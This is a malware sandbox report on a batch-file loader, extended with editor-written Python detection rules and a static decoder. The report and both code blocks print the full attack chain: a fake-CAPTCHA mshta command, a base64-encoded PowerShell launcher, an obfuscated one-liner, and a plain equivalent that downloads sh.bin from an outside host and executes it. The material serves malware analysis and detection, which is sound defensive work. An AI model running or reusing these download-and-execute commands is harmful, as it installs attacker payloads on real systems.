File name: virus.bat
Full analysis: https://app.any.run/tasks/a99b535a-5ebd-4072-b5ba-2eb7493eca90
Verdict: Malicious activity
Threats: loader

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 12, 2025, 18:18:27
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
reflection
loader
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with no line terminators
MD5: CED876CFB590963F224E93855679D5AC
SHA1: B000D4D4D8571DAB741D2013189FECCB646BC66D
SHA256: 9E8A67140719995207A3242966B16EC02CCF5B54F4D4E34E1FB86DE87D8DBDF1
SSDEEP: 3:rN6e/IVKX3K8jAPahsTDiAZzwe5t+RbqRF4I1yMQRWLTB:Z6ewM3xAih8muzwjIMPyt

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3808)
      • powershell.exe (PID: 1488)
    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 3808)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1488)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 1488)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1488)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 1488)
    • Base64-obfuscated command line is found

      • mshta.exe (PID: 2164)
    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 2164)
    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3808)
      • mshta.exe (PID: 2164)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 3808)
    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 1488)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1488)
  • INFO

    • The process uses the downloaded file

      • mshta.exe (PID: 2164)
      • powershell.exe (PID: 3808)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2164)
    • Checks proxy server information

      • mshta.exe (PID: 2164)
      • powershell.exe (PID: 1488)
    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 3808)
    • Disables trace logs

      • powershell.exe (PID: 1488)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
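Detection logic for the signatures above, written as an added example by the editor (it is not ANY.RUN code and not part of the report). The rules run over constructed process-creation records built from the command lines and parent processes listed in the Process information section of this report (the -Enc argument of PID 3808 is truncated), plus one benign PowerShell event with an invented PID 4242 to show what the rules leave alone. Two points the sample makes: the obfuscated command line of PID 1488 never contains the string DownloadString, so a rule keyed on that misses it, while Net.WebClient, [ScriptBlock]::Create and the |Member| probing survive the obfuscation; and the mshta.exe line carries a URL followed by a "#" comment with lure text, the way fake-CAPTCHA ("ClickFix") clipboard payloads do so that the pasted Run line looks like a verification string.

```python
"""Process-creation rules for the cmd.exe -> mshta.exe -> powershell.exe chain in this report."""
import re

# Constructed event records: PIDs, parents and command lines as listed in the Process
# information section (the -Enc argument truncated), plus one benign PowerShell event
# (PID 4242, invented) to show what the rules ignore.
EVENTS = [
    {"pid": 3560, "parent": "explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\virus.bat" "'},
    {"pid": 2164, "parent": "cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://solve.porw.org/awjsx.captcha?u=ff0c0b18-0056-47b0-9efd-2a9e88ea7e43"
                " # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1483''"},
    {"pid": 3808, "parent": "mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc '
                "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYA"},
    {"pid": 1488, "parent": "powershell.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command '
                r"gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name)"
                r".(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name)"
                r".Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)"
                r".PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),"
                r"[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://d1.exploredairyaptitude.shop/sh.bin';"
                r"[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name)"
                r".Invoke((Variable lW).Value)).InvokeReturnAsIs()"},
    {"pid": 4242, "parent": "svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]


def has(pattern, text):
    return re.search(pattern, text, re.I) is not None


def evaluate(event):
    """Return the set of rule names the event matches."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    hits = set()
    if name == "mshta.exe" and has(r"https?://", cmd):
        hits.add("mshta_remote_url")            # HTA fetched from a URL and run without touching disk
    if has(r"https?://\S+\s+#\s*\S", cmd):
        hits.add("url_with_decoy_comment")      # URL followed by '#' and lure text
    if name == "powershell.exe":
        # powershell.exe accepts any unambiguous switch prefix, so match the common
        # short forms (-w / -win / -windowstyle, -e / -ec / -enc, -ep / -ex) too.
        if has(r"(?:^|\s)-w(?:in|indowstyle)?\s+(?:hidden|1)\b", cmd):
            hits.add("powershell_hidden_window")
        if has(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", cmd):
            hits.add("powershell_encoded_command")
        # The obfuscated command never contains 'DownloadString'; Net.WebClient,
        # [ScriptBlock]::Create and the |Member| probing survive, so key on those.
        if (has(r"(?:^|\s)-e(?:p|x|xecutionpolicy)\s+bypass\b", cmd)
                and has(r"net\.webclient", cmd)
                and has(r"scriptblock\]::create|\|member\|", cmd)):
            hits.add("powershell_bypass_webclient_reflection")
        if event["parent"].lower() == "mshta.exe":
            hits.add("powershell_spawned_by_mshta")
    return hits


def scan(events):
    """pid -> sorted rule names, for every event that matched at least one rule."""
    return {e["pid"]: sorted(evaluate(e)) for e in events if evaluate(e)}


if __name__ == "__main__":
    for pid, rules in scan(EVENTS).items():
        print(pid, rules)
```

The benign event carries -ExecutionPolicy Bypass and is not flagged: bypass alone is too common in administration scripts to alert on, which is why the WebClient rule requires the download and script-block construction alongside it.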
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 123
Monitored processes: 7
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Process chain (from the parent fields in the process list below): explorer.exe -> cmd.exe (PID 3560) -> mshta.exe (PID 2164) -> powershell.exe (PID 3808) -> powershell.exe (PID 1488); cmd.exe and each powershell.exe also start a conhost.exe.

Graph nodes: start, cmd.exe (no specs), conhost.exe (no specs), mshta.exe, powershell.exe (no specs), conhost.exe (no specs), powershell.exe, conhost.exe (no specs)

Process information (PID, CMD, Path, Indicators, Parent process)
PID: 1488
CMD: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://d1.exploredairyaptitude.shop/sh.bin';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 2164
CMD: mshta https://solve.porw.org/awjsx.captcha?u=ff0c0b18-0056-47b0-9efd-2a9e88ea7e43 # ✅ ''I am not a robot - reCAPTCHA Verification ID: 1483''
Path: C:\Windows\System32\mshta.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft (R) HTML Application host
Exit code: 0
Version: 11.00.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 3220
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3560
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\virus.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 3808
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcALQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4ATgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4ATgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGQAMQAuAGUAeABwAGwAbwByAGUAZABhAGkAcgB5AGEAcAB0AGkAdAB1AGQAZQAuAHMAaABvAHAALwBzAGgALgBiAGkAbgAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA==
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4300
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5472
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
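Static decoding of the PID 3808 command line, as an added example by the editor (not code from ANY.RUN or from the sample). -EncodedCommand is base64 over UTF-16LE, and -w 1 is -WindowStyle 1, that is Hidden. The decoded script is a Start-Process of the 32-bit powershell.exe whose -ArgumentList reproduces the PID 1488 command line, with every single quote doubled because it sits inside a single-quoted literal. The inner command never names the methods it calls: it picks them with Get-Member (aliased Member) by index and by -like wildcards. The code resolves those lookups against member-name tables the editor supplied, taken from what Get-Member reports for these objects in Windows PowerShell 5.1 (methods first, then properties, alphabetical within each) and trimmed to the objects the script touches; treat the tables as an assumption, not as data from the sandbox run. Nothing is executed and nothing is fetched.

```python
"""Static decode of the PID 3808 -EncodedCommand and of the member-name wildcards
in the PowerShell it launches. Nothing here executes or downloads anything."""
import base64
import fnmatch
import re

# The -Enc argument exactly as listed for PID 3808 above, joined into one string.
ENC = (
    "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMA"
    "UABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAA"
    "SABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJwAtAHcAJwAsACcAaABpAGQAZABlAG4AJwAsACcALQBlAHAAJwAsACcAYgB5AHAAYQBzAHMAJwAsACcA"
    "LQBuAG8AcAAnACwAJwAtAEMAbwBtAG0AYQBuAGQAJwAsACcAZwBkAHIAIAAtACoAOwBTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEMAaQBVACAAKAAuACQA"
    "RQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4A"
    "TgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4A"
    "TgBhAG0AZQApAHwATQBlAG0AYgBlAHIAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAHQAKgBvAG0AKgBkACcAJwB9ACkALgBOAGEAbQBlACkALgBJAG4AdgBvAGsAZQAoACQA"
    "RQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4A"
    "TgBhAG0AZQApAC4AKAAoACQARQB4AGUAYwB1AHQAaQBvAG4AQwBvAG4AdABlAHgAdAAuACgAKAAkAEUAeABlAGMAdQB0AGkAbwBuAEMAbwBuAHQAZQB4AHQAfABNAGUAbQBiAGUAcgApAFsANgBdAC4A"
    "TgBhAG0AZQApAC4AUABzAE8AYgBqAGUAYwB0AC4ATQBlAHQAaABvAGQAcwB8AFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0AHsAJABfAC4ATgBhAG0AZQAtAGwAaQBrAGUAJwAnACoAbwBtACoAZQAnACcAfQApAC4A"
    "TgBhAG0AZQApAC4ASQBuAHYAbwBrAGUAKAAnACcATgAqAC0ATwAqACcAJwAsACQAVABSAFUARQAsACQAVABSAFUARQApACwAWwBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEMAbwBtAG0AYQBuAGQAVAB5AHAAZQBzAF0AOgA6AEMAbQBkAGwAZQB0ACkA"
    "TgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApADsAUwBlAHQALQBJAHQAZQBtACAAVgBhAHIAaQBhAGIAbABlADoALwBsAFcAIAAnACcAaAB0AHQAcABzADoALwAvAGQAMQAuAGUAeABwAGwAbwByAGUAZABhAGkAcgB5AGEAcAB0AGkAdAB1AGQAZQAuAHMAaABvAHAALwBzAGgALgBiAGkAbgAnACcAOwBbAFMAYwByAGkAcAB0AEIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAF"
    "UAKQAuAFYAYQBsAHUAZQAuACgAKAAoACgARwBJACAAVgBhAHIAaQBhAGIAbABlADoAQwBpAFUAKQAuAFYAYQBsAHUAZQB8AE0AZQBtAGIAZQByACkAfABXAGgAZQByAGUALQBPAGIAagBlAGMAdAB7ACQAXwAuAE4AYQBtAGUALQBsAGkAawBlACcAJwAqAG4AbAAqAGcAJwAnAH0AKQAuAE4AYQBtAGUAKQAuAEkAbgB2AG8AawBlACgAKABWAGEAcgBpAGEAYgBsAGUAIABsAFcAKQAuAFYAYQBsAHUAZQApACkALgBJAG4AdgBvAGsAZQBSAGUAdAB1AHIAbgBBAHMASQBzACgAKQAnAA=="
)


def decode_encoded_command(blob):
    """-EncodedCommand is base64 over UTF-16LE. Command lines in logs are often
    truncated, so a dangling odd byte is split off and returned instead of raising."""
    raw = base64.b64decode(blob)
    cut = len(raw) - len(raw) % 2
    return raw[:cut].decode("utf-16-le"), raw[cut:]


def argument_list(script):
    """Items of the Start-Process -ArgumentList. A quote doubled inside a
    single-quoted PowerShell literal is one literal quote."""
    tail = re.search(r"-ArgumentList\s+(.*)$", script, re.S).group(1)
    return [m.replace("''", "'") for m in re.findall(r"'((?:[^']|'')*)'", tail)]


# Member names as Get-Member lists them in Windows PowerShell 5.1 (methods first,
# then properties, alphabetical within each). Editor-supplied and trimmed to the
# objects the script touches: an assumption, not data taken from the sandbox run.
ENGINE_INTRINSICS = ["Equals", "GetHashCode", "GetType", "ToString",
                     "Events", "Host", "InvokeCommand", "InvokeProvider", "SessionState"]
INVOKE_COMMAND = ["Equals", "ExpandString", "GetCmdlet", "GetCmdletByTypeName",
                  "GetCmdlets", "GetCommand", "GetCommandName", "GetCommands",
                  "GetHashCode", "GetType", "InvokeScript", "NewScriptBlock", "ToString",
                  "HasErrors"]
WEB_CLIENT = ["DownloadData", "DownloadFile", "DownloadString", "DownloadStringAsync",
              "OpenRead", "UploadData", "UploadFile", "UploadString", "UploadValues"]
CMDLETS = ["Invoke-Expression", "New-Alias", "New-Item", "New-Object", "New-Variable"]


def like(names, pattern):
    """PowerShell -like: a case-insensitive glob (* ? and [...])."""
    return [n for n in names if fnmatch.fnmatchcase(n.lower(), pattern.lower())]


def resolve(command):
    """Resolve each obfuscated lookup in the inner -Command, in the order the script
    evaluates them: ($ExecutionContext|Member)[N], the two Where-Object filters on
    InvokeCommand, the wildcard handed to GetCommandName, and the WebClient filter."""
    idx = sorted({int(i) for i in re.findall(r"\|Member\)\[(\d+)\]", command)})
    pats = re.findall(r"-like'([^']+)'", command)
    cmd_pat = re.search(r"Invoke\('([^']+)',\$TRUE,\$TRUE\)", command).group(1)
    return {
        "intrinsics_member": [ENGINE_INTRINSICS[i] for i in idx],
        "lookup_method": like(INVOKE_COMMAND, pats[0]),
        "name_method": like(INVOKE_COMMAND, pats[1]),
        "cmdlet": like(CMDLETS, cmd_pat),
        "webclient_method": like(WEB_CLIENT, pats[2]),
        "urls": re.findall(r"https?://[^\s'\"]+", command),
    }


def plain_equivalent(r):
    """The same behaviour written without the reflection."""
    return (f"$wc = {r['cmdlet'][0]} Net.WebClient; "
            f"[ScriptBlock]::Create($wc.{r['webclient_method'][0]}('{r['urls'][0]}')).InvokeReturnAsIs()")


if __name__ == "__main__":
    script, dangling = decode_encoded_command(ENC)
    args = argument_list(script)
    print(script[:110], "...")
    print("child switches:", args[:6], "dangling bytes:", dangling)
    print(resolve(args[6]))
    print(plain_equivalent(resolve(args[6])))
```

The resolved chain is New-Object Net.WebClient, DownloadString on the URL held in $lW, and [ScriptBlock]::Create(...).InvokeReturnAsIs() on whatever comes back: a download-and-execute of sh.bin with no method name a string match could catch. Because the tables are trimmed, a pattern that resolves to exactly one name here could in principle match more members on a real object; the point of running it offline is to read the intent without giving the sample a chance to run.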
Total events: 13 519
Read events: 13 502
Write events: 17
Delete events: 0

Modification events (PID and process | operation | key | name | value)

2164 mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix | (empty)
2164 mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
2164 mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | 0
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | (empty)
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | (empty)
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | 1048576
1488 powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | %windir%\tracing

The Tracing\powershell_RASAPI32 values are the defaults the RAS tracing subsystem writes the first time a process loads rasapi32.dll (here the 32-bit PowerShell, hence WOW6432Node, while it checks proxy settings for its download); they are created with tracing off rather than switched off, so the "Disables trace logs" signature is a weak signal on its own. The mshta.exe CachePrefix writes are WinINet initialising the IE cache containers.
Executable files: 0
Suspicious files: 3
Text files: 4
Unknown types: 0

Dropped files (PID | process | filename | type, with hashes)

1488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_32ecejvr.tte.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1488 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ghwbruki.eqa.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mexnf3nf.eii.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2164 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\sh_ykxto[1].mp4 | binary
MD5: EC0668B7D6CF8C11ACF13767E28803F1
SHA256: F59ABFA2C0D02EA31B01E0D079217B4F1ED10F4E0929AF7A0286A9D72074438A
3808 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_z3qbfyrf.xk1.ps1 | text
